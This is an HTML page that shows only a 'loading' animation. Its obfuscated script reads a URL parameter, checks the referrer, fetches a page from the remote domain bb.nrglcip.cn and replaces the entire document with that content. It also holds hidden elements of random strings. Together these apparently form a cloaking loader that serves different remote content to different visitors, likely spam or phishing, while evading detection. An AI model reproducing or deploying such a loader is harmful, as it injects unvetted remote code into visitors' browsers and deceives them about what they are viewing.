<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .K7nTUzZupj1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .K7nTUzZupj1 .bAU3N77ncU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .K7nTUzZupj1 .content {
            line-height: 50px;
            text-align: center
        }

        .K7nTUzZupj1 .img {
            width: 100%
        }

        .K7nTUzZupj1 .PGRXrsf1T {
            text-align: center
        }

        .K7nTUzZupj1 .PGRXrsf1T span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .K7nTUzZupj1 .PGRXrsf1T span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .K7nTUzZupj1 .PGRXrsf1T span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .K7nTUzZupj1 .PGRXrsf1T span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .K7nTUzZupj1 .PGRXrsf1T span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .K7nTUzZupj1 .PGRXrsf1T span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .K7nTUzZupj1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eY5fATPMHJuDi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var A82Tw77 = eY5fATPMHJuDi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ A82Tw77 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ A82Tw77 +".html?a=share";
		}
		
        Uz8jSIrT3=url+"#"+new Date().getTime();
        Uz8jSIrT3 && function() {
            $.get(Uz8jSIrT3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >SmZEoKpLlzyc2gzq5pBMQyTGrYyEmH2zYy6GykGI9sSoYno3DtHXPJQH3jNQD</h1>
<ul style='display:none' >aPxTvi4NFLSRFMNdKmCkNohsMCOCLNu</ul>
<b style='display:none' >BcYgrvGrMK45EKk2p1HCOPfrgFZ7gsPpIDJvAMMB9Q2QY7xXAVQSA3</b><div class="K7nTUzZupj1">
    <div class="bAU3N77ncU">
        <div class="PGRXrsf1T">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Va0UjWGOL7Gn76iUMoGuR</li>
<p  style='display:none'>R8GG2ot98Sp9btyw4oKzqh8R0YOvJeOzmlgS5G3VIZXBqr8iFQ6WLBoO4Vm3oa899fG3Nh12hk</p>
<li style='display:none' >Va0UjWGOL7Gn76iUMoGuR</li>
<li style='display:none' >Va0UjWGOL7Gn76iUMoGuR</li>
<h1 style='display:none' >WPZVDpe5zN6L5qbYQITH9cnklg99BaOocpY7gszdY0If</h1>
<ul style='display:none' >tbFROpOUjsnQ1F4mYqVxfnb</ul></body>
</html>